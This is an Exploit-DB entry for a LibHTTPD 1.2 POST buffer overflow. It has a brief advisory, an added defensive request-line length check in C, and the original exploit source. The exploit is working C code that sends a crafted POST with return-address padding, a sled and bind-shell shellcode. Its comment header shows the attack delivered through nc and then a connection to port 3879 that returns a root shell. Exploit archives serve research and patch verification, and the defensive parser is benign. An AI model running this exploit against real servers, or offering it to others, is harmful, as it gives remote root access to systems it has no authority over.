exploitdb | Xpl017Elz | EDB-ID:22016
Nov 13, 2002 - 12:00 a.m.

LibHTTPD 1.2 - POST Buffer Overflow

// source: https://www.securityfocus.com/bid/6172/info

LibHTTPD is vulnerable to a buffer overflow condition. By passing a POST request of excessive length, it is possible to overrun a static buffer. This may result in sensitive locations in memory being overwritten by attacker-supplied values.

Successful exploitation of this vulnerability may allow an attacker to execute arbitrary code with super user privileges.

It should be noted that this vulnerability was reported in LibHTTPD v1.2. It is not yet known whether earlier versions are affected. 
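
The length check whose absence the description above implies, as an added example: this is not LibHTTPD source and not part of the original advisory. The function names, the 1024-byte TARGET_MAX and the GET/POST allow-list are assumptions chosen for illustration; the request line is measured before anything is copied, and an oversize or non-printable target is rejected rather than truncated.

```c
#include <stdio.h>
#include <string.h>

#define TARGET_MAX 1024 /* assumed capacity of the fixed request buffer */
enum parse_result { PARSE_OK, PARSE_MALFORMED, PARSE_BAD_METHOD,
                    PARSE_TOO_LONG, PARSE_BAD_BYTE };

/* Hypothetical parser, not LibHTTPD source. Handles
 * "METHOD SP target [SP version] CRLF"; the target is copied only when it
 * fits in out_cap and is printable ASCII. Oversize is rejected, not truncated. */
enum parse_result parse_request_line(const char *req, size_t len,
                                     char *out, size_t out_cap)
{
    const char *eol = memchr(req, '\n', len);
    if (eol == NULL) return PARSE_MALFORMED;       /* no complete line */
    size_t line_len = (size_t)(eol - req);
    if (line_len > 0 && req[line_len - 1] == '\r') line_len--;
    const char *sp = memchr(req, ' ', line_len);
    if (sp == NULL) return PARSE_MALFORMED;
    size_t mlen = (size_t)(sp - req);
    if (!(mlen == 3 && memcmp(req, "GET", 3) == 0) &&
        !(mlen == 4 && memcmp(req, "POST", 4) == 0))
        return PARSE_BAD_METHOD;
    const char *target = sp + 1;
    size_t tlen = line_len - mlen - 1;
    const char *sp2 = memchr(target, ' ', tlen);   /* optional HTTP version */
    if (sp2 != NULL) tlen = (size_t)(sp2 - target);
    if (tlen == 0) return PARSE_MALFORMED;
    if (tlen >= out_cap) return PARSE_TOO_LONG;    /* checked before any copy */
    for (size_t i = 0; i < tlen; i++)
        if ((unsigned char)target[i] < 0x21 || (unsigned char)target[i] > 0x7e)
            return PARSE_BAD_BYTE;                 /* binary data in the target */
    memcpy(out, target, tlen);
    out[tlen] = '\0';
    return PARSE_OK;
}

/* Constructed input: "POST " + n filler bytes + CRLF; returns the verdict. */
enum parse_result check_filler_target(size_t n)
{
    static char req[8192];
    char out[TARGET_MAX];
    if (n > sizeof req - 7) return PARSE_MALFORMED;
    memcpy(req, "POST ", 5);
    memset(req + 5, 'A', n);
    memcpy(req + 5 + n, "\r\n", 2);
    return parse_request_line(req, 5 + n + 2, out, sizeof out);
}

int main(void) { printf("%d %d\n", check_filler_target(16), check_filler_target(0x408)); return 0; }
```

A server using a check like this would answer the rejected cases with an error status and log the request-line length, which also gives operators a signal for oversize POST lines.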

/*
**
** Lib HTTPd Remote Buffer Overflow exploit
**                             by Xpl017Elz
** __
** Testing exploit:
**
** bash$ (./0x82-Remote.libhttpdxpl;cat)|nc libhttphost 80
**
** (Ctrl+c)
** punt!
** bash$ nc libhttphost 3879
** uname
** Linux
** id
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),
** 3(sys),4(adm),6(disk),10(wheel)
** exit
** bash$
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <[email protected]>.
** My World: http://x82.i21c.net
**
*/

#include <stdio.h>
int main(/* args? */)
{
    int shadd2r;
    char b1ndsh[] = /* 129byte bindshellcode */
        "\211\3451\322\262f\211\3201\311\211\313C\211]\370C\211]\364K\211M\374\215M"
        "\364\315\2001\311\211E\364Cf\211]\354f\307E\356\017'\211M\360\215E\354\211E"
        "\370\306E\374\020\211\320\215M\364\315\200\211\320CC\315\200\211\320C\315"
        "\200\211\3031\311\262?\211\320\315\200\211\320A\315\200\353\030^\211u"
        "\b1\300\210F\007\211E\f\260\013\211\363\215M\b\215U\f\315\200\350\343\377"
        "\377\377/bin/sh";
    //--- POST &shellcode ---//
    fprintf(stdout,"POST ");
    for(shadd2r=0;shadd2r<0x408;shadd2r+=4)
    {/* rEDhAT Default: 0x804e482,
        Debian Address? */
        fprintf(stdout,"\202\344\004\b");
    }
    fprintf(stdout,"\r\n");
    //--- NOP,shellcode ---//
    for(shadd2r=0;shadd2r<0x3e8;shadd2r++)
    {/* SSSSSSSS...SSSSSSSSS;;; */
        fprintf(stdout,"S");
    }
    fprintf(stdout,"%s\r\nx0x\r\nx82\r\nl0l\r\n",b1ndsh);
}
